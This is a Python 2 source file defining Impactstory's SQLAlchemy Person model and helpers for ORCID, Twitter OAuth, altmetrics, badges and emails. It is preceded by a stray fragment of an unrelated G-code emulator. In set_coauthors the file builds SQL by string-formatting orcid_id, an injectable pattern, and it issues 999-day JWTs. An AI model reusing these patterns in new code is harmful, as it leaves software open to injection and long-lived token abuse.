Runs http request and returns all G-Code I/O from it
:param executable: Function connected to HTTP Request to execute
:return:
"""
with self._emulate() as h:
with GCodeWatcher(emulator_settings=self._config) as watcher:
asyncio.run(executable(hardware=h))
yield GCodeProgram.from_g_code_watcher(watcher)
|
person.py
|
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import deferred
from sqlalchemy import orm
from sqlalchemy import text
from sqlalchemy import func
from app import db
from models import product # needed for sqla i think
from models import badge # needed for sqla i think
from models.product import make_product
from models.product import distinct_product_list
from models.orcid import OrcidProfile
from models.orcid import clean_orcid
from models.orcid import NoOrcidException
from models.orcid import OrcidDoesNotExist
from models.badge import Badge
from models.orcid import make_and_populate_orcid_profile
from models.source import sources_metadata
from models.source import Source
from models.refset import Refset
from models.emailer import send
from models.log_email import save_email
from models.log_openness import save_openness_log
from util import elapsed
from util import chunks
from util import date_as_iso_utc
from util import days_ago
from util import safe_commit
from util import calculate_percentile
from util import as_proportion
from time import time
from time import sleep
from copy import deepcopy
import jwt
import os
import shortuuid
import requests
import json
import re
import datetime
import logging
import operator
import threading
import hashlib
import math
from nameparser import HumanName
from collections import defaultdict
from requests_oauthlib import OAuth1Session
from util import update_recursive_sum
class PersonExistsException(Exception):
pass
def get_random_people(n, refset_only=False):
# this simpler way didn't work: func.setseed(0.42)
# below way is from https://github.com/khanduri/khanduri.github.io/blob/master/_posts/2016-02-26-fetch-rows-in-random-order-with-seed-support.md
sql = text('select setseed({0});'.format(0.42))
db.engine.execute(sql)
q = Person.query
if refset_only:
q = q.filter(Person.campaign == "2015_with_urls")
q = q.order_by(func.random())
q = q.limit(n)
people = q.all()
return people
def delete_person(orcid_id):
# also need delete all the badges, products
product.Product.query.filter_by(orcid_id=orcid_id).delete()
badge.Badge.query.filter_by(orcid_id=orcid_id).delete()
# and now delete the person. have to do this after deleting the stuff above.
Person.query.filter_by(orcid_id=orcid_id).delete()
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(orcid_id)
def set_person_email(orcid_id, email, high_priority=False):
my_person = Person.query.filter_by(orcid_id=orcid_id).first()
my_person.email = email
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(orcid_id)
def update_person(my_person, properties_to_change):
for k, v in properties_to_change.iteritems():
setattr(my_person, k, v)
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
# we should abstract this so it can work with any jsonb person column
def update_promos(my_person, new_promos):
# note this does not overwrite anything unless you do it on purpose;
# if you don't give it the key, it ignores it.
for k, v in new_promos.iteritems():
my_person.promos[k] = v
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
def set_person_claimed_at(my_person):
my_person.claimed_at = datetime.datetime.utcnow().isoformat()
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
def get_full_twitter_profile(twitter_creds):
oauth = OAuth1Session(
os.getenv('TWITTER_CONSUMER_KEY'),
client_secret=os.getenv('TWITTER_CONSUMER_SECRET'),
resource_owner_key=twitter_creds["oauth_token"],
resource_owner_secret=twitter_creds["oauth_token_secret"]
)
url = "https://api.twitter.com/1.1/account/verify_credentials.json?include_email=true"
r = oauth.get(url)
full_twitter_profile = r.json()
return full_twitter_profile
def make_temporary_person_from_orcid(orcid_id):
my_person = Person()
my_person.id = "u_is{}".format(shortuuid.uuid()[0:5])
my_person.created = datetime.datetime.utcnow()
print u"starting make_temporary_person_from_orcid: made new person for {}".format(my_person)
my_person.orcid_id = orcid_id
my_person.refresh()
print u"finished make_temporary_person_from_orcid: made new person for {}".format(my_person)
return my_person
def make_person(twitter_creds, high_priority=False, landing_page=None):
if Person.query.filter_by(twitter=twitter_creds["screen_name"]).first():
raise PersonExistsException
my_person = Person()
my_person.id = "u_is{}".format(shortuuid.uuid()[0:5])
my_person.created = datetime.datetime.utcnow()
my_person.claimed_at = datetime.datetime.utcnow().isoformat()
my_person.landing_page = landing_page
print u"\nin make_person: made new person for {}".format(my_person)
return connect_twitter(my_person, twitter_creds, set_everything_possible=True)
def connect_orcid(my_person, orcid_id):
print u"adding a brand new orcid_id for {}: {}".format(my_person.full_name, orcid_id)
my_person.orcid_id = orcid_id
# save it here, so we've got their orcid
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
# then keep going!
return refresh_orcid_info_and_save(my_person)
def disconnect_twitter(my_person):
my_person.twitter_creds = None
my_person.twitter = None
print u"\nDisconnected Twitter from: {}".format(my_person)
db.session.add(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
return my_person
def connect_twitter(my_person, twitter_creds, set_everything_possible=False):
full_twitter_profile = get_full_twitter_profile(twitter_creds)
full_twitter_profile.update(twitter_creds)
my_person.twitter_creds = full_twitter_profile
my_person.twitter = full_twitter_profile["screen_name"]
if set_everything_possible:
my_person.email = full_twitter_profile["email"]
twitter_full_name = full_twitter_profile["name"]
try:
parsed_name = HumanName(twitter_full_name)
my_person.family_name = parsed_name["last"]
my_person.given_names = parsed_name["first"]
if my_person.given_names and len(my_person.given_names) <= 2 and parsed_name["middle"]:
my_person.given_names = parsed_name["middle"]
except KeyError:
my_person.first_name = twitter_full_name
print u"\nAdded Twitter info to person: {}".format(my_person)
db.session.add(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
return my_person
def refresh_orcid_info_and_save(my_person):
print u"refreshing all orcid info for {}".format(my_person.orcid_id)
my_person.refresh_orcid_info()
print u"storing refreshed person in db"
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
# this should be refactored with refresh_profile(). doing it this way is dumb.
def refresh_person(my_person, high_priority=False):
print u"refreshing {}".format(my_person.orcid_id)
# for testing on jason's local, so it doesn't have to do a real refresh
# sleep(5)
# return my_person
my_person.refresh(high_priority=high_priority)
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
def refresh_profile(orcid_id, high_priority=False):
print u"refreshing {}".format(orcid_id)
my_person = Person.query.options(orm.undefer('*')).filter_by(orcid_id=orcid_id).first()
# for testing on jason's local, so it doesn't have to do a real refresh
# sleep(5)
# return my_person
my_person.refresh(high_priority=high_priority)
db.session.merge(my_person)
commit_success = safe_commit(db)
if commit_success:
print u"committed {}".format(orcid_id)
else:
print u"COMMIT fail on {}".format(orcid_id)
return my_person
def top_acheivement_persons(persons, achievements, limit):
top_persons = (
Person.query.
join(Person.badges).
filter(Person.orcid_id.in_(persons), Badge.name.in_(achievements)).
# group_by(Person.id).
# order_by(func.sum(Badge.percentile).desc()).
order_by(Badge.percentile.desc()).
limit(limit).
all()
)
# if persons with provided achievements is less then limit add another persons
new_limit = limit - len(top_persons)
if new_limit:
top_persons_ids = [person.orcid_id for person in top_persons]
top_persons.extend(Person.query.filter(~Person.orcid_id.in_(top_persons_ids), Person.orcid_id.in_(persons)).
limit(new_limit).
all())
return top_persons
def avg_openess(persons):
openness = Person.query.filter(Person.orcid_id.in_(persons)).with_entities(func.avg(Person.openness)).scalar()
return openness
def get_sources(products):
sources = []
for source_name in sources_metadata:
source = Source(source_name, products)
if source.posts_count > 0:
sources.append(source)
return sources
class Person(db.Model):
id = db.Column(db.Text, primary_key=True)
orcid_id = db.Column(db.Text, unique=True)
given_names = db.Column(db.Text)
family_name = db.Column(db.Text)
created = db.Column(db.DateTime)
updated = db.Column(db.DateTime)
claimed_at = db.Column(db.DateTime)
orcid_api_raw_json = deferred(db.Column(JSONB))
fresh_orcid = db.Column(db.Boolean)
invalid_orcid = db.Column(db.Boolean)
email = db.Column(db.Text)
twitter = db.Column(db.Text)
twitter_creds = db.Column(MutableDict.as_mutable(JSONB))
campaign = db.Column(db.Text)
landing_page = db.Column(db.Text)
depsy_id = db.Column(db.Text)
depsy_percentile = db.Column(db.Float)
affiliation_name = db.Column(db.Text)
affiliation_role_title = db.Column(db.Text)
post_counts = db.Column(MutableDict.as_mutable(JSONB))
mendeley_sums = db.Column(MutableDict.as_mutable(JSONB)) # not deferred for now
num_products = db.Column(db.Integer)
num_posts = db.Column(db.Integer)
num_mentions = db.Column(db.Integer)
num_badges = db.Column(db.Integer)
openness = db.Column(db.Float)
events_emailed = db.Column(MutableDict.as_mutable(JSONB))
weekly_event_count = db.Column(db.Float)
monthly_event_count = db.Column(db.Float)
tweeted_quickly = db.Column(db.Boolean)
finished_wizard = db.Column(db.Boolean)
saw_opencon_landing_page = db.Column(db.Boolean)
num_fulltext = db.Column(db.Integer)
num_user_supplied_fulltext = db.Column(db.Integer)
num_any_oa = db.Column(db.Integer)
num_cc_by = db.Column(db.Integer)
num_cc_restricted = db.Column(db.Integer)
num_cc0_pd = db.Column(db.Integer)
coauthors = db.Column(MutableDict.as_mutable(JSONB))
promos = db.Column(MutableDict.as_mutable(JSONB))
error = db.Column(db.Text)
products = db.relationship(
'Product',
lazy='subquery',
cascade="all, delete-orphan",
backref=db.backref("person", lazy="subquery"),
foreign_keys="Product.orcid_id"
)
badges = db.relationship(
'Badge',
lazy='subquery',
cascade="all, delete-orphan",
backref=db.backref("person", lazy="subquery"),
foreign_keys="Badge.orcid_id"
)
def __init__(self):
self.invalid_orcid = False
@property
def impactstory_url(self):
if self.orcid_id:
return u"https://impactstory.org/u/{}".format(self.orcid_id)
else:
return None
# doesn't have error handling; called by refresh when you want it to be robust
def call_apis(self, high_priority=False, overwrite_orcid=True, overwrite_metrics=True):
# parse orcid so we now what to gather
start_time = time()
print u"** calling set_api_raw_from_orcid"
if overwrite_orcid or not self.orcid_api_raw_json:
self.set_api_raw_from_orcid()
else:
print u"not calling orcid because no overwrite"
print u"elapsed in call_apis after set_api_raw_from_orcid is {}s".format(elapsed(start_time, 2))
self.set_from_orcid()
print u"set_from_orcid took {}s".format(elapsed(start_time, 2))
print u"elapsed in call_apis after set_from_orcid is {}s".format(elapsed(start_time, 2))
products_without_dois = [p for p in self.products if not p.doi]
if products_without_dois:
print u"** calling set_data_for_all_products for crossref doi lookup"
# do this first, so have doi for everything else
self.set_data_for_all_products("set_doi_from_crossref_biblio_lookup", high_priority)
else:
print u"** all products have dois data, so not calling crossref to look for dois"
print u"elapsed in call_apis after set_doi_from_crossref_biblio_lookup is {}s".format(elapsed(start_time, 2))
products_without_altmetric = [p for p in self.products if not p.altmetric_api_raw]
if overwrite_metrics or products_without_altmetric:
print u"** calling set_data_for_all_products for altmetric"
self.set_data_for_all_products("set_data_from_altmetric", high_priority)
else:
print u"** all products have altmetric data and no overwrite, so not calling altmetric"
print u"elapsed in call_apis after set_data_from_altmetric is {}s".format(elapsed(start_time, 2))
# products_without_mendeley = [p for p in self.products if not p.mendeley_api_raw]
# if overwrite_metrics or products_without_mendeley:
# print u"** calling set_data_for_all_products for mendeley"
# self.set_data_for_all_products("set_data_from_mendeley", high_priority)
# else:
# print u"** all products have mendeley data and no overwrite, so not calling mendeley"
#
# print u"elapsed in call_apis after set_data_from_mendeley is {}s".format(elapsed(start_time, 2))
# doesn't have error handling; called by refresh when you want it to be robust
def refresh_from_db(self):
print u"* refresh_from_db {}".format(self.orcid_id)
self.error = None
start_time = time()
try:
print u"** calling call_apis with overwrites false"
self.call_apis(overwrite_orcid=False, overwrite_metrics=False)
print u"** calling calculate"
self.calculate()
except (KeyboardInterrupt, SystemExit):
# let these ones through, don't save anything to db
raise
except requests.Timeout:
print u"got a requests timeout"
self.error = "requests timeout"
except OrcidDoesNotExist:
self.invalid_orcid = True
self.error = "invalid orcid"
print u"error: invalid orcid: {}".format(self.orcid_id)
except Exception:
logging.exception("refresh error")
self.error = "refresh error"
print u"in generic exception handler, so rolling back in case it is needed"
db.session.rollback()
finally:
self.updated = datetime.datetime.utcnow().isoformat()
if self.error:
print u"ERROR refreshing person {}: {}".format(self.id, self.error)
# doesn't throw errors; sets error column if error
def refresh(self, high_priority=False):
print u"* refreshing {} ({})".format(self.orcid_id, self.full_name)
self.error = ""
start_time = time()
try:
print u"** calling call_apis"
self.call_apis(high_priority=high_priority)
print u"** after call_apis, at {sec}s elapsed".format(
sec=elapsed(start_time)
)
print u"** calling calculate"
self.calculate()
print u"** after calculate, at {sec}s elapsed".format(
sec=elapsed(start_time)
)
print u"** finished refreshing all {num} products for {orcid_id} ({name}) in {sec}s".format(
orcid_id=self.orcid_id,
name=self.full_name,
num=len(self.all_products),
sec=elapsed(start_time)
)
except (KeyboardInterrupt, SystemExit):
# let these ones through, don't save anything to db
raise
except requests.Timeout:
print u"got a requests timeout"
self.error = "requests timeout"
except OrcidDoesNotExist:
self.invalid_orcid = True
self.error = "invalid orcid"
print u"error: invalid orcid: {}".format(self.orcid_id)
except Exception:
logging.exception("refresh error")
self.error = "refresh error"
print u"in generic exception handler, so rolling back in case it is needed"
db.session.rollback()
finally:
self.updated = datetime.datetime.utcnow().isoformat()
if self.error:
print u"ERROR refreshing person {}: {}".format(self.id, self.error)
def set_mendeley(self, high_priority=False):
self.set_data_for_all_products("set_data_from_mendeley", high_priority)
def set_mendeley_sums(self):
self.mendeley_sums = None
products_with_mendeley = [p for p in self.all_products if p.mendeley_api_raw]
if products_with_mendeley:
self.mendeley_sums = {
"readers": self.mendeley_readers,
"country": self.mendeley_countries,
"country_percent": as_proportion(self.mendeley_countries),
"subdiscipline": self.mendeley_disciplines,
"subdiscipline_percent": as_proportion(self.mendeley_disciplines),
"academic_status": self.mendeley_job_titles,
"academic_status_percent": as_proportion(self.mendeley_job_titles),
"h_index": self._mendeley_h_index,
"percent_of_products": self.mendeley_percent_of_products
}
else:
print "no mendeley"
return self.mendeley_sums
def set_products(self, products_to_add):
updated_products = []
for product_to_add in products_to_add:
needs_to_be_added = True
for my_existing_product in self.products:
if str(my_existing_product.orcid_put_code) == str(product_to_add.orcid_put_code):
# update the product biblio from the most recent orcid api response
my_existing_product.orcid_api_raw_json = product_to_add.orcid_api_raw_json
my_existing_product.set_biblio_from_orcid()
updated_products.append(my_existing_product)
needs_to_be_added = False
if needs_to_be_added:
updated_products.append(product_to_add)
self.products = updated_products
def recalculate_openness(self):
self.set_openness()
self.set_num_oa_licenses()
openness_badges = ["percent_fulltext", "all_fulltext", "open_license"]
self.assign_badges(limit_to_badges=openness_badges)
self.set_badge_percentiles(limit_to_badges=openness_badges)
def set_num_oa_licenses(self):
self.num_fulltext = 0
self.num_user_supplied_fulltext = 0
self.num_any_oa = 0
self.num_cc_by = 0
self.num_cc_restricted = 0
self.num_cc0_pd = 0
for p in self.products_with_dois:
if p.fulltext_url:
self.num_fulltext += 1
if p.user_supplied_fulltext_url:
self.num_user_supplied_fulltext += 1
if p.fulltext_url and p.license:
if p.license != "unknown":
self.num_any_oa += 1
if p.license == "cc-by":
self.num_cc_by += 1
elif p.license == "cc0" or p.license == "pd":
self.num_cc0_pd += 1
elif "cc-" in p.license:
self.num_cc_restricted += 1
def email_new_stuff(self):
if not self.claimed_at:
return
if not self.email:
return
DATE_NOTIFICATION_EMAILS_STARTED = "2018-09-10"
if not self.events_emailed:
self.events_emailed = {"emailed": []}
print u"looking for new stuff to email for {}".format(self.email)
posts = self.get_posts()
posts_to_email = []
for post in posts:
post_date_iso = post["posted_on"]
if post_date_iso > date_as_iso_utc(self.created):
if post_date_iso > DATE_NOTIFICATION_EMAILS_STARTED:
if post["url"] not in self.events_emailed["emailed"]:
posts_to_email.append(post)
if not posts_to_email:
print u"nothing to email."
return
print u"have things to email!"
post_urls = [post["url"] for post in posts_to_email]
self.events_emailed["emailed"] += post_urls
post_count_by_source = {}
for post in posts_to_email:
source = post["source"]
try:
post_count_by_source[source] += 1
except KeyError:
post_count_by_source[source] = 1
new_event_counts = post_count_by_source.items()
details_dict = self.to_dict()
details_dict["post_count_to_email"] = new_event_counts
send(self.email, "Your research is getting new attention online", "notification", {"profile": details_dict}, for_real=True)
# send(self.email, "Your research is getting new attention online", "notification", {"profile": details_dict}, for_real=False)
save_email(self.orcid_id, new_event_counts)
# def email_new_badge(self):
# if not self.claimed_at:
# return
# if not self.email:
# return
#
# if not self.get_badge("all_fulltext"):
# print u"not a hero."
# return
#
# print u"{} is a hero! going to email you!".format(self.full_name)
# details_dict = self.to_dict()
# send(self.email, "You're an Open Access Hero!", "new_badge", {"profile": details_dict}, for_real=True)
# # send(self.email, "You an an OA Hero!", "new_badge", {"profile": details_dict}, for_real=False)
#
def run_log_openness(self):
save_openness_log(self)
## used to fix people's pictures if they have updated them on twitter
## called from command line, ie python update.py Person.update_twitter_profile_data --id=0000-0003-3904-7546
def update_twitter_profile_data(self):
if not self.twitter or not self.twitter_creds:
print u"Can't update twitter, doesn't have twitter username or twitter_creds"
return None
oauth = OAuth1Session(
os.getenv('TWITTER_CONSUMER_KEY'),
client_secret=os.getenv('TWITTER_CONSUMER_SECRET')
)
url = "https://api.twitter.com/1.1/users/lookup.json?screen_name={}".format(self.twitter)
r = oauth.get(url)
response_data = r.json()
first_profile = response_data[0]
keys_to_update = ["profile_image_url", "profile_image_url_https"]
for k in keys_to_update:
self.twitter_creds[k] = first_profile[k]
print u"Updated twitter creds for @{}".format(self.twitter)
return self.twitter_creds
def refresh_orcid_info(self):
self.set_api_raw_from_orcid()
self.set_from_orcid()
self.set_num_products()
def calculate(self):
# things with api calls in them, or things needed to make those calls
start_time = time()
self.set_fulltext_urls()
self.set_depsy()
print u"finished api calling part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
# everything else
start_time = time()
self.set_post_counts() # do this first
self.set_mendeley_sums()
self.set_num_posts()
self.set_num_mentions()
self.set_num_products()
self.set_openness() # do after set_fulltext_urls
self.set_num_oa_licenses() # do after set_fulltext_urls, before assign_badges
self.set_event_counts()
self.set_coauthors() # do this last, uses scores
print u"finished calculating part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
start_time = time()
self.assign_badges()
self.set_badge_percentiles()
print u"finished badges part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
def mini_calculate(self):
self.set_num_posts()
self.set_num_mentions()
self.set_num_products()
def set_depsy(self):
if self.email:
headers = {'Accept': 'application/json'}
# example http://depsy.org/api/search/person?email=ethan@weecology.org
url = "http://depsy.org/api/search/person?email={}".format(self.email)
# might throw requests.Timeout
try:
r = requests.get(url, headers=headers, timeout=10)
except requests.Timeout:
print u"timeout in set_depsy"
return
response_dict = r.json()
if response_dict["count"] > 0:
self.depsy_id = response_dict["list"][0]["id"]
self.depsy_percentile = response_dict["list"][0]["impact_percentile"]
print u"got a depsy id for {}: {}".format(self.id, self.depsy_id)
@property
def first_name(self):
first_name = self.given_names
try:
parsed_name = HumanName(self.full_name)
first_name = parsed_name["first"]
if first_name and len(first_name) <= 2 and parsed_name["middle"]:
first_name = parsed_name["middle"]
except KeyError:
pass
# print u"set first name {} as first name for {}".format(self.first_name, self.full_name)
return first_name
def set_api_raw_from_orcid(self):
start_time = time()
# look up profile in orcid
try:
orcid_data = make_and_populate_orcid_profile(self.orcid_id)
self.orcid_api_raw_json = orcid_data.api_raw_profile
except requests.Timeout:
self.error = "timeout from requests when getting orcid"
print u"finished {method_name} in {sec}s".format(
method_name="set_api_raw_from_orcid".upper(),
sec = elapsed(start_time, 2)
)
def set_fresh_orcid(self):
orcid_created_date_timestamp = self.orcid_api_raw_json["history"]["submission-date"]["value"]
orcid_created_date = datetime.datetime.fromtimestamp(orcid_created_date_timestamp/1000)
profile_created_date = self.created
if not profile_created_date:
# because just made and not set yet
profile_created_date = datetime.datetime.utcnow()
self.fresh_orcid = (profile_created_date - orcid_created_date).total_seconds() < (60*60) # 1 hour
def set_from_orcid(self):
total_start_time = time()
if not self.orcid_api_raw_json:
print u"no orcid data in db for {}".format(self.orcid_id)
return
orcid_data = OrcidProfile(self.orcid_id)
orcid_data.api_raw_profile = self.orcid_api_raw_json
self.given_names = orcid_data.given_names
self.family_name = orcid_data.family_name
self.set_fresh_orcid()
if orcid_data.best_affiliation:
self.affiliation_name = orcid_data.best_affiliation["name"]
self.affiliation_role_title = orcid_data.best_affiliation["role_title"]
else:
self.affiliation_name = None
self.affiliation_role_title = None
# now walk through all the orcid works and save the most recent ones in our db, deduped.
products_to_add = []
for work in orcid_data.works:
new_product = make_product(work)
products_to_add = distinct_product_list(new_product, products_to_add)
products_to_add.sort(key=operator.attrgetter('year_int'), reverse=True)
# keep only most recent products
products_to_add = products_to_add[:100]
self.set_products(products_to_add)
def set_fulltext_urls(self):
# handle this in impactstory
# ### first: user supplied a url? it is open!
# print u"first making user_supplied_fulltext_url products open"
for p in self.all_products:
if p.user_supplied_fulltext_url:
p.set_oa_from_user_supplied_fulltext_url(p.user_supplied_fulltext_url)
# then call oadoi on the rest!
dyno_name = os.getenv("DYNO", "")
if "schedule" in dyno_name or "RQ_worker_queue" in dyno_name:
print u"not calling call_oadoi because is a scheduled or RQ dyno"
else:
print u"isn't a scheduled or rq dyno, so calling call_oadoi"
self.call_oadoi()
def call_oadoi_on_everything(self):
return self.call_oadoi(call_even_if_already_open=True)
def call_oadoi(self, call_even_if_already_open=False):
start_time = time()
products_for_oadoi = self.products_with_dois
if not products_for_oadoi:
return
self.set_data_for_all_products("set_data_from_oadoi", include_products=products_for_oadoi)
open_products = [p for p in products_for_oadoi if p.has_fulltext_url]
print u"oadoi found {} of {} products had a free fulltext url ({})".format(
len(open_products), len(products_for_oadoi), round(float(len(open_products))/len(products_for_oadoi), 2))
print u"finished {method_name} on {num} products in {sec}s".format(
method_name="call_oadoi".upper(),
num = len(products_for_oadoi),
sec = elapsed(start_time, 2)
)
def set_data_for_all_products(self, method_name, high_priority=False, include_products=None):
start_time = time()
threads = []
# use all products unless passed a specific set
if not include_products:
include_products = self.all_products
# start a thread for each product
for work in include_products:
method = getattr(work, method_name)
process = threading.Thread(target=method, args=[high_priority])
process.start()
threads.append(process)
# wait till all work is done
for process in threads:
process.join()
# now go see if any of them had errors
# need to do it this way because can't catch thread failures; have to check
# object afterwards instead to see if they logged failures
for work in include_products:
if work.error:
# don't print out doi here because that could cause another bug
# print u"setting person error; {} for product {}".format(work.error, work.id)
self.error = work.error
print u"finished {method_name} on {num} products in {sec}s".format(
method_name=method_name.upper(),
num = len(include_products),
sec = elapsed(start_time, 2)
)
@property
def picture(self):
try:
url = self.twitter_creds["profile_image_url"].replace("_normal", "").replace("http:", "https:")
except TypeError:
# no twitter. let's try gravatar
try:
email_hash = hashlib.md5(self.email).hexdigest()
except TypeError:
# bummer, no email either. that's ok, gravatar will return a blank face for
# an email they don't have
email_hash = ""
url = u"https://www.gravatar.com/avatar/{}?s=110&d=mm".format(email_hash)
return url
@property
def wikipedia_urls(self):
articles = set()
for my_product in self.products_with_dois:
if my_product.post_counts_by_source("wikipedia"):
articles.update(my_product.wikipedia_urls)
return articles
@property
def distinct_fans_count(self):
fans = set()
for my_product in self.products_with_dois:
for fan_name in my_product.twitter_posters_with_followers:
fans.add(fan_name)
return len(fans)
@property
def countries_using_mendeley(self):
countries = set()
for my_product in self.all_products:
for my_country in my_product.countries_using_mendeley:
if my_country:
countries.add(my_country)
return sorted(countries)
@property
def countries(self):
countries = set()
for my_product in self.products:
for my_country in my_product.countries:
if my_country:
countries.add(my_country)
return sorted(countries)
@property
def subscores(self):
resp = []
subscore_names = ["buzz", "engagement", "openness", "fun"]
for subscore_name in subscore_names:
resp.append({
"name": subscore_name,
"display_name": subscore_name
})
return resp
@property
def sources(self):
sources = []
for source_name in sources_metadata:
source = Source(source_name, self.products)
if source.posts_count > 0:
sources.append(source)
return sources
# convenience so can have all of these set for one profile
def set_post_details(self):
for my_product in self.products_with_dois:
my_product.set_post_details()
def set_coauthors(self):
start_time = time()
# comment out the commit. this means coauthors made during this commit session don't show up on this refresh
# but doing it because is so much faster
# safe_commit(db)
# now go for it
# print u"running coauthors for {}".format(self.orcid_id)
coauthor_orcid_id_query = u"""select distinct orcid_id
from product
where doi in
(select doi from product where orcid_id='{}')""".format(self.orcid_id)
rows = db.engine.execute(text(coauthor_orcid_id_query))
# remove own orcid_id
orcid_ids = [row[0] for row in rows if row[0] if row[0] != self.orcid_id]
if not orcid_ids:
return
# don't load products or badges
coauthors = Person.query.filter(Person.orcid_id.in_(orcid_ids)).options(orm.noload('*')).all()
resp = {}
for coauthor in coauthors:
resp[coauthor.orcid_id] = {
"name": coauthor.full_name,
"id": coauthor.id,
"orcid_id": coauthor.orcid_id,
"num_posts": coauthor.num_posts,
}
self.coauthors = resp
print u"elapsed {}s end of coathors".format(elapsed(start_time, 2))
def get_event_dates(self):
event_dates = []
for product in self.products_with_dois:
if product.event_dates:
for source, dates_list in product.event_dates.iteritems():
event_dates += dates_list
# now sort them all
event_dates.sort(reverse=False)
return event_dates
def set_event_counts(self):
self.monthly_event_count = 0
self.weekly_event_count = 0
event_dates = self.get_event_dates()
if not event_dates:
return
for event_date in event_dates:
event_days_ago = days_ago(event_date)
if event_days_ago <= 7:
self.weekly_event_count += 1
if event_days_ago <= 30:
self.monthly_event_count += 1
def get_tweeter_names(self, most_recent=None):
twitter_posts = self.get_twitter_posts(most_recent)
names = [post["attribution"] for post in twitter_posts if "attribution" in post]
return names
def get_twitter_posts(self, most_recent=None):
twitter_posts = [post for post in self.get_posts() if post["source"]=="twitter"]
if most_recent:
twitter_posts = twitter_posts[0:most_recent]
return twitter_posts
def get_posts(self):
posts = []
for my_product in self.products_with_dois:
posts += my_product.posts
return posts
@property
def percent_open_license(self):
if not self.products_with_dois:
return None
num_open_license_products = 0
if self.num_cc_by:
num_open_license_products += self.num_cc_by
if self.num_cc0_pd:
num_open_license_products += self.num_cc0_pd
num_products_with_dois = len(self.products_with_dois)
if num_products_with_dois >= 1:
response = min(1, round((num_open_license_products / float(num_products_with_dois)), 3))
else:
response = None
return response
@property
def percent_fulltext(self):
if not self.products_with_dois:
return None
num_products_with_dois = len(self.products_with_dois)
num_open_products = len([p for p in self.products_with_dois if p.has_fulltext_url])
# only defined if three or more products
if num_products_with_dois >= 1:
response = min(1, round((num_open_products / float(num_products_with_dois)), 3))
else:
response = None
return response
def set_openness(self):
self.openness = self.percent_fulltext
return self.openness
def post_counts_by_source(self, source_name):
if self.post_counts and source_name in self.post_counts:
return self.post_counts[source_name]
return 0
def set_post_counts(self):
self.post_counts = {}
for p in self.products_with_dois:
if p.post_counts:
for metric, count in p.post_counts.iteritems():
try:
self.post_counts[metric] += int(count)
except KeyError:
self.post_counts[metric] = int(count)
# print u"setting post_counts", self.post_counts
def set_num_posts(self):
self.num_posts = 0
if self.post_counts:
self.num_posts = sum(self.post_counts.values())
def set_num_mentions(self):
self.num_mentions = sum([p.num_mentions for p in self.all_products])
def set_num_products(self):
self.num_products = len(self.all_products)
def get_token(self):
# print u"in get_token with ", self
payload = {
'id': self.id,
'email': self.email,
'num_products': self.num_products,
'finished_wizard': self.finished_wizard,
'orcid_id': self.orcid_id,
'twitter_screen_name': self.twitter,
'first_name': self.first_name,
'claimed_at': date_as_iso_utc(self.claimed_at),
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=999),
}
# for testing
# payload["orcid_id"] = None
# payload["num_products"] = 0
token = jwt.encode(payload, os.getenv("JWT_KEY"))
return token.decode('unicode_escape')
@property
def badges_to_show_in_ui(self):
return [b for b in self.badges_for_api if b.my_badge_type.show_in_ui]
@property
def overview_badges(self):
overview_possibilities = self.badges_to_show_in_ui
if len(overview_possibilities) <= 3:
return overview_possibilities
already_have_groups = []
badges_to_return = []
for my_badge in overview_possibilities:
if my_badge.group not in already_have_groups and my_badge.group != "fun":
badges_to_return.append(my_badge)
already_have_groups.append(my_badge.group)
if len(badges_to_return) < 3:
for my_badge in overview_possibilities:
if my_badge.group != "fun" and (my_badge.name not in [b.name for b in badges_to_return]):
badges_to_return.append(my_badge)
return badges_to_return[0:3]
@property
def badges_for_api(self):
badges = []
for my_badge in self.badges:
if my_badge.value and my_badge.my_badge_type.valid_badge:
# custom exclusions specific to badge type
badges.append(my_badge)
badges.sort(key=lambda x: x.sort_score, reverse=True)
# custom exclusions specific to badge type
if len(badges) > 1:
badges = [b for b in badges if b.name != "first_steps"]
return badges
def get_badge(self, badge_name):
for my_badge in self.badges:
if my_badge.name == badge_name:
return my_badge
return None
def assign_badges(self, limit_to_badges=[]):
for badge_assigner_class in badge.all_badge_assigners():
badge_assigner = badge_assigner_class()
if limit_to_badges:
if badge_assigner.name not in limit_to_badges:
# isn't a badge we want to assign right now, so skip
continue
candidate_badge = badge_assigner.get_badge_or_None(self)
already_assigned_badge = self.get_badge(badge_assigner.name)
if candidate_badge:
if already_assigned_badge:
already_assigned_badge.value = candidate_badge.value
already_assigned_badge.products = candidate_badge.products
already_assigned_badge.support = candidate_badge.support
print u"{} already had badge, now updated {}".format(
self.id, already_assigned_badge)
else:
print u"{} first time got badge {}".format(self.id, candidate_badge)
self.badges.append(candidate_badge)
if candidate_badge.name == 'babel':
print u"BABEL support: {}".format(candidate_badge.support)
else:
# print u"nope, {} doesn't get badge {}".format(self.id, badge_assigner.name)
if already_assigned_badge:
print u"{} doesn't get badge {}, but had it before, so removing".format(self.id, badge_assigner.name)
if already_assigned_badge.name == 'babel':
print u"first, here was its BABEL support: {}".format(already_assigned_badge.support)
